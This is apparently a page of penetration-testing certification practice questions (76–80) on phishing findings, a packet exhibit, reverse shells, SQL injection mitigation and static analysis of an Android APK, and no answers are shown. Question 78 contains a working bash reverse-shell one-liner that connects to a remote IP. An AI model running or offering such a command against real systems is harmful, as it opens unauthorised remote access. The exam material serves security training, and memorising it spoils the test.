Question 76

A consultant is performing a social engineering attack against a client. The consultant was able to collect a number of usernames and passwords using a phishing campaign. The consultant is given credentials to log on to various employees email accounts. Given the findings, which of the following should the consultant recommend be implemented?
  • Question 77

    Click the exhibit button.

    A penetration tester is performing an assessment when the network administrator shows the tester a packet sample that is causing trouble on the network. Which of the following types of attacks should the tester stop?
  • Question 78

    A tester intends to run the following command on a target system:
    bash -i >& /dev/tcp/10.2.4.6/443 0> &1
    Which of the following additional commands would need to be executed on the tester's Linux system to make the previous command successful?
  • Question 79

    A recently concluded penetration test revealed that a legacy web application is vulnerable lo SQL injection Research indicates that completely remediating the vulnerability would require an architectural change, and the stakeholders are not m a position to risk the availability of the application Under such circumstances, which of the following controls are low-effort, short-term solutions to minimize the SQL injection risk?
    (Select TWO).
  • Question 80

    A company requested a penetration tester review the security of an in-house-developed Android application.
    The penetration tester received an APK file to support the assessment. The penetration tester wants to run SAST on the APK file. Which of the following preparatory steps must the penetration tester do FIRST?
    (Select TWO)